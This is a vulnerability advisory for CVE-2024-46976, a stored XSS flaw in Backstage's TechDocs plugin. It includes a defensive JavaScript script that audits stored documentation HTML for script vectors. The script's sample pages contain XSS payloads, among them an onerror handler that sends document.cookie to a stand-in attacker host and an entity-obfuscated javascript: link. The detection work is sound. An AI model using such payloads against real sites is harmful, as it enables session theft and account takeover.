Cross-Site Scripting in Backstage TechDocs Plugin by Spotify
CVE-2024-46976

5.4 MEDIUM

Key Information:

Vendor: Backstage
Status: Vendor
CVE Published: 17 September 2024

What is CVE-2024-46976?

The Backstage TechDocs plugin allows the injection of executable scripts because content read from TechDocs storage buckets is not sufficiently validated before it is rendered. An attacker who controls that content (low privileges, per the CVSS vector) can store documentation pages containing malicious scripts; when a victim views the documentation, or follows a link the attacker crafted, those scripts execute in the victim's browser in the context of the Backstage application. The issue is fixed in version 1.10.13 of the plugin. Users are strongly encouraged to upgrade, since no workaround is known.
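As an added example, not code from the Backstage project or from this advisory, the script below audits rendered TechDocs HTML for the kinds of active content the description refers to: script-bearing tags, inline event handlers and javascript: links. It is the check an operator would run over objects read back from the TechDocs storage bucket. The function names (findScriptVectors, auditBucket), the object keys and the three sample pages are constructed for the illustration; sampleBucket is an in-memory stand-in for the real object store.

```javascript
// Added example (not Backstage project code): heuristic audit of rendered
// TechDocs HTML for script vectors. Names and sample data are assumptions.

// Tags that can execute or load active content on their own.
const ACTIVE_TAGS = new Set(['script', 'iframe', 'object', 'embed', 'base', 'meta', 'form']);
// Attributes whose value is a URL and may carry a javascript: scheme.
const URL_ATTRS = new Set(['href', 'src', 'action', 'formaction', 'xlink:href', 'data']);

// Start-tag tokenizer: <tag attr=value attr="value" attr='value'>. It covers
// ordinary markup, not every edge case of the HTML spec (see the usage note).
const TAG_RE = /<\s*([a-zA-Z][\w:-]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Minimal entity decoding so an href like "jav&#x61;script:" is not missed.
function decodeEntities(s) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&tab;/gi, '\t')
    .replace(/&newline;/gi, '\n');
}

// Browsers strip leading control characters and tabs/newlines anywhere in a
// URL before looking at the scheme, so normalise the same way before comparing.
function isDangerousUrl(value) {
  const v = decodeEntities(value)
    .replace(/^[\u0000-\u0020]+/, '')
    .replace(/[\t\n\r]/g, '')
    .toLowerCase();
  return v.startsWith('javascript:') || v.startsWith('vbscript:') || v.startsWith('data:text/html');
}

// Returns a list of {kind, tag, detail} findings for one HTML document.
function findScriptVectors(html) {
  const findings = [];
  let m;
  TAG_RE.lastIndex = 0;
  while ((m = TAG_RE.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrText = m[2] || '';
    if (ACTIVE_TAGS.has(tag)) findings.push({ kind: 'tag', tag, detail: tag });
    ATTR_RE.lastIndex = 0;
    let a;
    while ((a = ATTR_RE.exec(attrText)) !== null) {
      const name = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (name.startsWith('on')) {
        findings.push({ kind: 'handler', tag, detail: name }); // onerror, onload, ...
      } else if (name === 'srcdoc') {
        findings.push({ kind: 'srcdoc', tag, detail: name }); // inline document in an iframe
      } else if (URL_ATTRS.has(name) && isDangerousUrl(value)) {
        findings.push({ kind: 'url', tag, detail: `${name}=${value}` });
      }
    }
  }
  return findings;
}

// Constructed sample pages standing in for objects in a TechDocs storage
// bucket: one clean page, one with an event-handler payload, one with an
// entity-obfuscated javascript: link plus a script tag.
const sampleBucket = {
  'default/component/docs-a/index.html':
    `<h1>Docs</h1><p>See <a href="./api.html">API</a>.</p><img src="img/arch.png" alt="arch">`,
  'default/component/docs-b/index.html':
    `<h1>Docs</h1><img src=x onerror="fetch('https://attacker.invalid/?c='+document.cookie)">`,
  'default/component/docs-c/index.html':
    `<p><a href="  JAVA&#x53;CRIPT:alert(document.domain)">release notes</a></p><script>alert(1)</script>`,
};

// Maps each flagged object key to its findings; clean pages are omitted.
function auditBucket(bucket) {
  const report = {};
  for (const [key, html] of Object.entries(bucket)) {
    const f = findScriptVectors(html);
    if (f.length > 0) report[key] = f;
  }
  return report;
}

console.log(JSON.stringify(auditBucket(sampleBucket), null, 2));
```

Feed it HTML pulled from the bucket with your storage provider's tooling. The tokenizer is a triage heuristic and will miss some obfuscations a browser accepts, so it is not a substitute for sanitising at render time with a maintained library such as DOMPurify. Its value is in finding what an attacker may already have written to storage: upgrading the plugin changes how stored content is rendered but does not remove objects that are already there.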


CVSS V3.1

Score: 5.4
Severity: MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Confidentiality: Low
Integrity: Low
Availability: None
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed

Timeline

  • Vulnerability published: 17 September 2024